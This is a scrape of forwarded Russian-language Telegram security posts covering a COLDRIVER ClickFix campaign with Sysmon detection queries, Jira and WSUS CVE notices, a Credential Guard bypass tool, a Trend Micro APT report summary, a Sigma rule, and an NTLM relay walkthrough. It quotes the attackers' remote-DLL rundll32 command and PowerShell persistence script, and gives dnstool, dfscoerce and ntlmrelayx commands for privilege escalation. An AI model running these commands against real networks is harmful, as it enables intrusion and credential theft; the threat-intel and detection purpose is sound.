Forwarded from Detection is easy
Всем привет! 💻 ✌️
Давайте познакомимся с отчетом Google TI
Атака начинается с фишинга —
Атакующие предлагают жертве выполнить удалённую DLL
DLL используется для загрузки следующего этапа
Отличительные особенности:
🔤 Установка Python для запуска скриптов
🔤 Регистрация собственного расширения в реестре для хранения части ключа шифрования
🔤 Закрепление через планировщик задач
🔤 Использование
🔭 Обнаружение:
🔤 Описание аномалий подсистемы BITS в моей статье на хакере и в PR
🔤 Запуск DLL с удалённых ресурсов
🔤 Добавление новых расширений в ключ реестра
#detection@detectioneasy
#ttp@detectioneasy
Давайте познакомимся с отчетом Google TI
Атака начинается с фишинга —
ClickFix (Fake Captcha)Атакующие предлагают жертве выполнить удалённую DLL
rundll32.exe \\Ninspectguarantee.org\check\iamnotarobot.dll,humanCheck ;l'am not a robot
DLL используется для загрузки следующего этапа
Отличительные особенности:
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\.pietas" /v "ratio" /t REG_BINARY /d "f5e210ec114e1992b81ff89be58cfb2778005f734972239b9655b23fcee5593f19554d0a74dad52c67956781367b06e6" /f
powershell -c "
$s = New-Object -ComObject Schedule.Service;
$s.Connect();
$t = $s.NewTask(0);
$p = $t.principal;
$p.logontype = 3;
$p.RunLevel = 0;
$a = $t.Actions.Create(0);
$a.Path = \"$env:APPDATA\Python38-64\pythonw.exe\";
$a.Arguments = \"$env:APPDATA\Python38-64\Lib\libsystemhealthcheck.py\";
$a.WorkingDirectory = \"$env:APPDATA\Python38-64\";
$tr = $t.Triggers.Create(9);
$tr.userID = \"$env:computername\"+\"\\\"+\"$env:username\";
$tr.enabled = $true;
$s.GetFolder(\"\").RegisterTaskDefinition(\"System health check\", $t, 6, $null, $null, 0) | Out-Null;"
bitsadmin для загрузки .py-скриптов через BITS
ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image endswith "rundll32.exe" and CommandLine match "^\s*\\\\" and CommandLine match "\.dll,"
ProviderName="Microsoft-Windows-Sysmon" and EventId=22 and Image endswith "rundll32.exe" and QueryName not match "^(?:[A-Za-z0-9-]+\.)*(?:company\.com|company\.loc|corp\.local)$"
HKEY_CURRENT_USER\SOFTWARE\Classes\#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Google Cloud Blog
To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER | Google Cloud Blog
Russia state-sponsored COLDRIVER started using new malware immediately following a May public disclosure of their activity.
Forwarded from SecuriXy.kz
🚨 Уязвимость Path Traversal в Jira (CVE-2025-22167)
Баг позволяет записывать файлы в любую доступную JVM-папку. При комбинировании с другими эксплойтами возможен RCE.
CVSS 8.7
Подробности: atlassian.com
📌 Проверьте свои инстансы и обновитесь как можно скорее.
Баг позволяет записывать файлы в любую доступную JVM-папку. При комбинировании с другими эксплойтами возможен RCE.
CVSS 8.7
Подробности: atlassian.com
📌 Проверьте свои инстансы и обновитесь как можно скорее.
👍1
Forwarded from 1N73LL1G3NC3
Credential Guard was supposed to end credential dumping. It didn't. @bytewreck just dropped a new blog post detailing techniques for extracting credentials on fully patched Windows 11 & Server 2025 with modern protections enabled.
🔗 DumpGuard
Proof-of-Concept tool for extracting NTLMv1 hashes from sessions on modern Windows systems.
P.S. Previously, crack.sh operated a free service for performing rainbow table lookups to recover NT hashes from NTLMv1 responses, but was recently shut down due to maintenance issues. In its absence, a new free service was published at ntlmv1.com.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from 1N73LL1G3NC3
Credential Guard was supposed to end credential dumping. It didn't. @bytewreck just dropped a new blog post detailing techniques for extracting credentials on fully patched Windows 11 & Server 2025 with modern protections enabled.
🔗 DumpGuard
Proof-of-Concept tool for extracting NTLMv1 hashes from sessions on modern Windows systems.
P.S. Previously, crack.sh operated a free service for performing rainbow table lookups to recover NT hashes from NTLMv1 responses, but was recently shut down due to maintenance issues. In its absence, a new free service was published at ntlmv1.com.
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
На соревновании Pwn2Own продемонстрированы взломы смартфонов, NAS, принтеров и устройств умного дома
Подведены итоги трёх дней соревнований Pwn2Own Ireland 2025, на которых были продемонстрированы 46 успешных атак с использованием 73 ранее неизвестных уязвимостей (0-day) в смартфонах, маршрутизаторах, устройствах для умного дома, принтерах, сетевых хранилищах…
🔗Ссылка:
https://opennet.ru/64111/
https://opennet.ru/64111/
Forwarded from Whitehat Lab
Hawktrace
CVE-2025-59287 WSUS Remote Code Execution
A technical WSUS advisory for CVE-2025-59287: unsafe deserialization in Windows Server Update Services that allows remote code execution.
Критическая уязвимость удалённого выполнения кода (RCE) в службе обновлений Windows Server (WSUS) от
Уязвимость позволяет не аутентифицированному пользователю осуществить удалённое выполнение кода с привилегиями уровня SYSTEM путём отправки вредоносных зашифрованных cookie
Оценка по CVSS - 9,8
Причина:
Небезопасная десериализация данных AuthorizationCookie посредством BinaryFormatter в методе EncryptionHelper.DecryptData()
Для исправления поставить патч:
23 октября 2025 года выпущено внеплановое (OOB) обновление, устраняющее данную проблему. Это накопительное обновление, поэтому перед его установкой не требуется применять предыдущие обновления — оно заменяет все ранее выпущенные исправления для затронутых версий. Если вы еще не установили октябрьское обновление безопасности Windows 2025, мы рекомендуем установить именно это внеплановое обновление
#wsus #cve #poc #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Threat Hunting Father 🦔
APT as a Service?😃
Premier Pass-as-a-Service — новый формат кибершпионажа
Trend Micro зафиксировала новую модель сотрудничества между multiple China-aligned APT groups — Earth Estries и Earth Naga.
Одна группа предоставляет готовый доступ («Premier Pass»), другая — разворачивает свои инструменты. Это делает шпионские кампании сложнее для атрибуции и детектирования.
⚙️ Формат атаки
• Earth Estries скомпрометировала внутренние веб-сервера и установила CrowDoor (бэкдор через DLL-sideloading).
• Через тот же доступ Estries передала контроль Earth Naga, которая развернула ShadowPad — известный фреймворк для постэксплуатации.
• В сетях жертв фиксировались совместные артефакты: CrowDoor → ShadowPad, общий C2, и одинаковые временные файлы.
• Обе группы параллельно атаковали телеком-операторов, госучреждения и ритейл в APAC и НАТО-регионах.
🧠 Новый тренд от Trend Micro
Исследователи назвали модель Premier Pass-as-a-Service — аналог «доступа как услуги»:
Это сдвигает фокус с Initial Access Brokers на операционные альянсы между APT-группами.
Trend Micro выделила четыре уровня такой кооперации — от случайного пересечения до полного предоставления инфраструктуры («операционного бокса») для другой группы.
Самый продвинутый тип — использование облачных сервисов (например, VSCode Remote Tunnel) как RAT-канала.
🧰 Инструментарий
Earth Estries:
• CrowDoor — DLL-sideload через
• Draculoader — загрузчик shellcode, финальные пейлоады CrowDoor / Cobalt Strike / HEMIGATE.
• Cobalt Strike — lateral movement / payload-доставка.
• Post-exploitation: AnyDesk, EarthWorm (SOCKS5 туннель), Blindsight (LSASS dump с NTFS evasion), кастомный SSP-дампер.
Earth Naga:
• ShadowPad — бэкдор с зашифрованным payload в реестре, загружается через
• Активно атакует гос- и телеком-сектор, Тайвань, APAC, НАТО, Латинскую Америку.
🧩 Что нового заметила Trend Micro
1) Коллаборация вместо одиночных кампаний — группировки действуют как «подрядчики» в единой операции.
2) Смещение стадии совместной работы — обмен происходит на поздних этапах (C2 и постэксплуатация), а не на этапе входа.
3) Роль-модель вместо атрибуции: разделение на разработчиков, провайдеров и операторов.
4) Доказательства общей инфраструктуры — CrowDoor и ShadowPad фиксируются в одной сессии, одних узлах.
5) «Operational box» и облачные туннели — новый способ маскировки C2 и снятия сетевых привязок.
📎 https://www.trendmicro.com/en_us/research/25/j/premier-pass-as-a-service.html
🦔 THF
Premier Pass-as-a-Service — новый формат кибершпионажа
Trend Micro зафиксировала новую модель сотрудничества между multiple China-aligned APT groups — Earth Estries и Earth Naga.
Одна группа предоставляет готовый доступ («Premier Pass»), другая — разворачивает свои инструменты. Это делает шпионские кампании сложнее для атрибуции и детектирования.
• Earth Estries скомпрометировала внутренние веб-сервера и установила CrowDoor (бэкдор через DLL-sideloading).
• Через тот же доступ Estries передала контроль Earth Naga, которая развернула ShadowPad — известный фреймворк для постэксплуатации.
• В сетях жертв фиксировались совместные артефакты: CrowDoor → ShadowPad, общий C2, и одинаковые временные файлы.
• Обе группы параллельно атаковали телеком-операторов, госучреждения и ритейл в APAC и НАТО-регионах.
Исследователи назвали модель Premier Pass-as-a-Service — аналог «доступа как услуги»:
Вместо продажи первичного входа, акторы предоставляют прямой доступ к уже закреплённым активам.
Это сдвигает фокус с Initial Access Brokers на операционные альянсы между APT-группами.
Trend Micro выделила четыре уровня такой кооперации — от случайного пересечения до полного предоставления инфраструктуры («операционного бокса») для другой группы.
Самый продвинутый тип — использование облачных сервисов (например, VSCode Remote Tunnel) как RAT-канала.
Earth Estries:
• CrowDoor — DLL-sideload через
LogServer.exe → VERSION.dll → зашифрованный shellcode.• Draculoader — загрузчик shellcode, финальные пейлоады CrowDoor / Cobalt Strike / HEMIGATE.
• Cobalt Strike — lateral movement / payload-доставка.
• Post-exploitation: AnyDesk, EarthWorm (SOCKS5 туннель), Blindsight (LSASS dump с NTFS evasion), кастомный SSP-дампер.
Earth Naga:
• ShadowPad — бэкдор с зашифрованным payload в реестре, загружается через
bdreinit.exe → wer.dll.• Активно атакует гос- и телеком-сектор, Тайвань, APAC, НАТО, Латинскую Америку.
1) Коллаборация вместо одиночных кампаний — группировки действуют как «подрядчики» в единой операции.
2) Смещение стадии совместной работы — обмен происходит на поздних этапах (C2 и постэксплуатация), а не на этапе входа.
3) Роль-модель вместо атрибуции: разделение на разработчиков, провайдеров и операторов.
4) Доказательства общей инфраструктуры — CrowDoor и ShadowPad фиксируются в одной сессии, одних узлах.
5) «Operational box» и облачные туннели — новый способ маскировки C2 и снятия сетевых привязок.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Forwarded from Whitehat Lab
Платформа с открытым исходным кодом для обмена, оценки, улучшения и управления правилами обнаружения (YARA, Sigma, Suricata и др.) с поддержкой API
Форматы:
Yara
Sigma
Zeek
Suricata
Crs
Nova
Elastic
Пример:
title: Encoded or Base64 Payload in HTTP POST to F5 Management API
id: f5-base64-upload-2025
description: Detects long base64 strings in HTTP POST body to management or shared endpoints.
author: abdulmyid@gmail.com
status: experimental
logsource:
product: webproxy
service: http
detection:
selection:
http.method: POST
url|contains:
- '/mgmt'
- '/shared'
http.request.body|contains_regexp: '[A-Za-z0-9+/]{200,}={0,2}'
condition: selection
level: medium
falsepositives:
- Legitimate encoded payloads (token exchanges, APIs).
#ti #rules #detection #soc #api
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RedTeam brazzers (Миша)
Всем привет!
А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )
Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (
2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так:
Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )
Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )
Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (
ncacn_np), а поверх TCP, поэтому появился POC, подключающийся к службе поверх ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так:
echo start > \\.\pipe\winreg. Все эти методы включения объединены под одним большим механизмом Service Triggers, подробный разбор которого вышел у наших коллег из TrustedSec.Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )
Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
# Атакуем комп с именем DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs